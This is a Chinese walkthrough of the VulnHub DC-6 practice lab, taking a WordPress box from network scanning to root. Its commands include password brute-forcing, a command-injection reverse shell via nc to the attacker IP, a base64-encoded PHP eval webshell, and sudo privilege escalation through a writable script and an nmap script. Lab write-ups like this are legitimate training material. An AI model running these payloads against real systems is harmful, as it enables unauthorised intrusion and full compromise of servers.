渗透环境:DC6 https://www.vulnhub.com/entry/dc-6,315/
攻击机:192.168.168.128
靶机:ip地址未知, 已知ip与攻击机在同一网段下

信息收集

主机存活扫描

1
nmap -sP 192.168.168.0/24

img

靶机ip为192.168.168.134

端口扫描

1
nmap -sS -p- 192.168.168.134

img

目录扫描

1
dirsearch -u http://wordy/ -e *

img

发现wordpress后台

渗透

使用wpscan扫描

1
wpscan --url http://wordy  --enumerate

发现存在的用户

img

使用burp进行爆破,失败
在原文下发现提示

img

使用提示中的字典

1
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

爆破成功

img

登录后台寻找突破口
发现一次存在命令执行的地方
在kali开启监听端口

1
nc -lvnp 4444

抓包修改

1
127.0.0.1 | nc 192.168.168.128 4444 -e /bin/bash

发送
上传木马

1
echo "PD9waHAgQGV2YWwoJF9QT1NUWydMMWFuZyddKTs/Pg=="|base64 -d > shell.php

蚁剑连接
在home下发现线索

img

提权

ssh连接
账号:graham
密码:GSo7isUM1D4

1
sudo -l

img

发现 /home/jens/backups.sh没有密码
往里面添上/bin/bash

1
echo /bin/bash >> /home/jens/backups.sh

以jens的身份执行

1
sudo -u jens /home/jens/backups.sh

发现当前身份变为jens

img

nmap提权

1
2
3

echo 'os.execute("/bin/bash")' > /tmp/shell
sudo nmap --script= /tmp/shell

提权成功

img

查看flag

img

DC-6 clear